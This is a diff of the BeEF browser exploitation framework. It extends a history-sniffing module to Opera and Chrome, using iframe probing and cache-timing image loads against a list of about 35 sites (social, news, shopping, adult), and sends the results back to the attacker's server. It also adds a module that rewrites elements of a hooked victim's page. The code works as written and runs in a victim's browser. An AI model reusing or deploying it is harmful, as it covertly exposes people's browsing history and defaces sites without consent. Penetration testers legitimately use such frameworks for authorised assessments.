+	  { 'name': 'AboveTopSecret.com', 'urls': [ 'http://www.abovetopsecret.com/forum/ats-scripts.js' ] },
+	  { 'category': 'Commerce' },
+	  { 'name': 'Diapers.com', 'urls': [ 'http://c1.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12',
+										 'http://c3.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12' ] },
+	  { 'name': 'Expedia', 'urls': [ 'http://www.expedia.com/static/default/default/scripts/expedia/core/e.js?v=release-2011-11-r4.9.317875' ] },
+	  { 'name': 'Amazon (US)', 'urls': [ 'http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-css-quirks/site-wide-3527593236.css._V162874846_.css' ] },
+	  { 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/CSS/template.v1.w.5723.0.css' ] },
+	  { 'name': 'eBay', 'urls': [ 'http://ir.ebaystatic.com/v4js/z/io/gbsozkl4ha54vasx4meo3qmtw.js' ] },
+      { 'category': 'Coding' },
+      { 'name': 'GitHub', 'urls': [ 'https://a248.e.akamai.net/assets.github.com/stylesheets/bundles/github-fa63b2501ea82170d5b3b1469e26c6fa6c3116dc.css' ] },
+      { 'category': 'Security' },
+      { 'name': 'Exploit DB', 'urls': [ 'http://www.exploit-db.com/wp-content/themes/exploit/style.css' ] },
+      { 'name': 'Packet Storm', 'urls': [ 'http://packetstormsecurity.org/img/pss.ico' ] },
+      { 'category': 'Email' },
+      { 'name': 'Hotmail', 'urls': [ 'https://secure.shared.live.com/~Live.SiteContent.ID/~16.2.9/~/~/~/~/css/R3WinLive1033.css' ] }
+	];
+	/*************************
+	 * CONFIGURABLE SETTINGS *
+	 *************************/
+	var TIME_LIMIT = 3;
+	var MAX_ATTEMPTS = 1;	
+}
 
 function sched_call(fn) {
   exec_next = fn;
@@ -160,7 +212,9 @@ function perform_check() {
   if (beef.browser.isFF() == 1) {
   	setTimeout(wait_for_read, 1);
   }
-  
+  if(beef.browser.isO() == 1){
+    setTimeout(wait_for_read, 1);
+  } 
 }
 
 
@@ -188,6 +242,18 @@ function wait_for_read() {
 		setTimeout(wait_for_read, 0);
 	  }	
    }
+   if (beef.browser.isO() == 1){
+      try{
+		
+        if(frames['f'].location.href != 'about:blank') throw 1;
+        
+        frames['f'].stop();
+        document.getElementById('f').src = 'javascript:"<body onload=\'parent.frame_ready = true\'>"';
+        setTimeout(wait_for_read2, 1);
+      } catch(e){
+        setTimeout(wait_for_read, 1);
+      }
+   }
 }
 
 function wait_for_read2() {
@@ -213,6 +279,9 @@ function navigate_to_target() {
   if (beef.browser.isIE() == 1) {
 	  setTimeout(wait_for_noread, 0);
   }
+  if (beef.browser.isO() == 1){
+      setTimeout(wait_for_noread, 1);
+  }
   urls++;
   document.getElementById("f").src = current_url;
 }
@@ -248,6 +317,17 @@ function wait_for_noread() {
     	}	
     	sched_call(wait_for_noread);    	
 	}
+    if (beef.browser.isO() == 1){
+       if (frames['f'].location.href == undefined){
+           confirm_visited = true;
+           throw 1;
+       }
+       if (cycles++ >= TIME_LIMIT) {
+           maybe_test_next();
+           return;
+       }
+        setTimeout(wait_for_noread, 1);
+     }
   } catch (e) {
     confirmed_visited = true;
     maybe_test_next();
@@ -262,6 +342,9 @@ function maybe_test_next() {
   if (beef.browser.isIE() == 1) {
   	   document.getElementById("f").src = 'about:blank';
   }
+  if (beef.browser.isO() == 1) {
+      document.getElementById('f').src = 'about:blank';
+  }
   if (target_off < targets.length) {
     if (targets[target_off].category) {
       //log_text(targets[target_off].category + ':', 'p', 'category');
@@ -312,7 +395,7 @@ function reload(){
 /* The handler for "run the test" button on the main page. Dispenses
    advice, resets state if necessary. */
 function start_stuff() {
-  if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 ) {
+  if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 || beef.browser.isO() == 1) {
   	  target_off = 0;
 	  attempt = 0;
 	  confirmed_visited = false;
@@ -321,15 +404,143 @@ function start_stuff() {
 	  maybe_test_next();
   }
   else {
-  	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=This proof-of-concept is specific to Firefox and Internet Explorer, and probably won\'t work for you.');
+  	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=This proof-of-concept is specific to Firefox, Internet Explorer, Chrome and Opera, and probably won\'t work for you.');
   }  
 }
 
+/**************/
+/***Visipisi***/
+/**************/
+var vp_result = {};
+
+var visipisi = {
+  webkit: function(url, cb) {
+    var start;
+    var loaded = false;
+    var runtest = function() {
+      window.removeEventListener("message", runtest, false);
+      var img = new Image();
+      start = new Date().getTime();
+      try{
+      img.src = url;
+      } catch(e) {}
+      var messageCB = function (e){
+      var now = new Date().getTime();
+          if (img.complete) {
+            delete img;
+            window.removeEventListener("message", messageCB, false);
+            cbWrap(true);
+          } else if (now - start > 10) {
+            delete img;
+	    if (window.stop !== undefined)
+		window.stop();
+            else
+		document.execCommand("Stop",false);
+            window.removeEventListener("message", messageCB, false);
+            cbWrap(false);
+        } else {
+          window.postMessage('','*');
+      	}
+
+    };
+    window.addEventListener("message", messageCB, false);
+    window.postMessage('','*');
+  };
+  cbWrap = function (value) {cb(value);};
+  window.addEventListener("message", runtest, false);
+  window.postMessage('','*');
+  }
+};
+
+function visipisiCB(vp, endCB, sites, urls, site, result){
+    if(result === null){
+	vp_result[site] = 'Whoops';
+     }
+     else{	
+	vp_result[site] = result ? 'visited' : 'not visited';
+     }
+     var next_site = sites.pop();
+     if(next_site)
+	vp( urls[next_site], function (result) { 
+	  visipisiCB(vp, endCB, sites, urls, next_site, result);
+	});
+      else
+	endCB();
+}
+
+function getVisitedDomains(){
+    var tests = {
+	facebook: 'https://s-static.ak.facebook.com/rsrc.php/v1/yJ/r/vOykDL15P0R.png',
+	twitter: 'https://twitter.com/images/spinner.gif',
+	digg: 'http://cdn2.diggstatic.com/img/sprites/global.5b25823e.png',
+	reddit: 'http://www.redditstatic.com/sprite-reddit.pZL22qP4ous.png',
+	hn: 'http://ycombinator.com/images/y18.gif',
+	stumbleupon: 'http://cdn.stumble-upon.com/i/bg/logo_su.png',
+	wired: 'http://www.wired.com/images/home/wired_logo.gif',
+	xkcd: 'http://imgs.xkcd.com/s/9be30a7.png',
+	linkedin: 'http://static01.linkedin.com/scds/common/u/img/sprite/sprite_global_v6.png',
+	slashdot: 'http://a.fsdn.com/sd/logo_w_l.png',
+	myspace: 'http://cms.myspacecdn.com/cms/x/11/47/title-WhatsHotWhite.jpg',
+	engadget: 'http://www.blogsmithmedia.com/www.engadget.com/media/engadget_logo.png',
+        lastfm: 'http://cdn.lst.fm/flatness/anonhome/1/anon-sprite.png',
+        pandora: 'http://www.pandora.com/img/logo.png',
+        youtube: 'http://s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif',
+        yahoo: 'http://l.yimg.com/ao/i/mp/properties/frontpage/01/img/aufrontpage-sprite.s1740.gif',
+        google: 'https://www.google.com/intl/en_com/images/srpr/logo3w.png',
+        hotmail: 'https://secure.shared.live.com/~Live.SiteContent.ID/~16.2.8/~/~/~/~/images/iconmap.png',
+        cnn: 'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/intl/hdr-globe-central.gif',
+        bbc: 'http://static.bbc.co.uk/frameworks/barlesque/1.21.2/desktop/3/img/blocks/light.png',
+        reuters: 'http://www.reuters.com/resources_v2/images/masthead-logo.gif',
+        wikipedia: 'http://upload.wikimedia.org/wikipedia/en/b/bc/Wiki.png',
+        amazon: 'http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-22._V183711641_.png',
+        ebay: 'http://p.ebaystatic.com/aw/pics/au/logos/logoEbay_x45.gif',
+        newegg: 'http://images10.newegg.com/WebResource/Themes/2005/Nest/neLogo.png',
+        bestbuy: 'http://images.bestbuy.com/BestBuy_US/en_US/images/global/header/hdr_logo.gif',
+	walmart: 'http://i2.walmartimages.com/i/header_wide/walmart_logo_214x54.gif',
+	perfectgirls: 'http://www.perfectgirls.net/img/logoPG_02.jpg',
+        abebooks: 'http://www.abebooks.com/images/HeaderFooter/siteRevamp/AbeBooks-logo.gif',
+	msy: 'http://msy.com.au/images/MSYLogo-long.gif',
+	techbuy: 'http://www.techbuy.com.au/themes/default/images/tblogo.jpg',
+	borders: 'http://www.borders.com.au/images/ui/logo-site-footer.gif',
+	mozilla: 'http://www.mozilla.org/images/template/screen/logo_footer.png',
+	anandtech: 'http://www.anandtech.com/content/images/globals/header_logo.png',
+	tomshardware: 'http://m.bestofmedia.com/i/tomshardware/v3/logo_th.png',
+	shopbot: 'http://i.shopbot.com.au/s/i/logo/en_AU/shopbot.gif',
+	staticice: 'http://staticice.com.au/images/banner.jpg',
+  };
+
+  var sites = [];
+  for (var k in tests)
+    sites.push(k);
+   sites.reverse();
+
+   vp = visipisi.webkit;
+   var first_site = sites.pop();
+   var end = function() {
+    	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+prepResult(vp_result));
+   }
+   vp(tests[first_site], function(result) {
+	visipisiCB(vp, end, sites, tests, first_site, result);
+    });
+}
+
+function prepResult(results){
+    var result_str ='<br>';
+    for(r in results){
+      result_str += r + ':' + results[r]+'<br>';
+    }
+    return result_str;
+}
 
 beef.execute(function() { 
+  if(beef.browser.isC() == 1){
+	getVisitedDomains();
+
+  } else {  
    urls = undefined;
    exec_next = null;
    start_stuff();
+ }
 });
 
 	

modules/browser/get_visited_domains/config.yaml

@@ -9,8 +9,8 @@ beef:
             enable: true
             category: "Browser"
             name: "Get Visited Domains"
-            description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done at http://lcamtuf.coredump.cx/cachetime/"
-            authors: ["keith_lee @keith55 http://milo2012.wordpress.com"]
+            description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done by Michal Zalewski at http://lcamtuf.coredump.cx/cachetime/"
+            authors: ["@keith55", "oxplot", "quentin"]
             target:
-                working: ["FF", "IE"]
-                not_working: ["O", "C", "S"]
+                working: ["FF", "IE", "O"]
+                not_working: ["C", "S"]

modules/browser/hooked_domain/deface_web_page/module.rb

@@ -7,7 +7,8 @@ class Deface_web_page < BeEF::Core::Command
 
   def self.options
 	configuration = BeEF::Core::Configuration.instance
-	favicon_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/favicon.ico"
+    proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+	favicon_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/favicon.ico"
     return [
 		{ 'name' => 'deface_title', 'description' => 'Page Title', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project', 'width'=>'200px' },
 		{ 'name' => 'deface_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width'=>'200px' },

modules/browser/hooked_domain/deface_web_page_component/command.js

@@ -0,0 +1,14 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var result = $j('<%= @deface_selector %>').each(function() {
+		$j(this).html('<%= @deface_content %>');
+	}).length;
+
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Defaced "+ result +" elements");
+});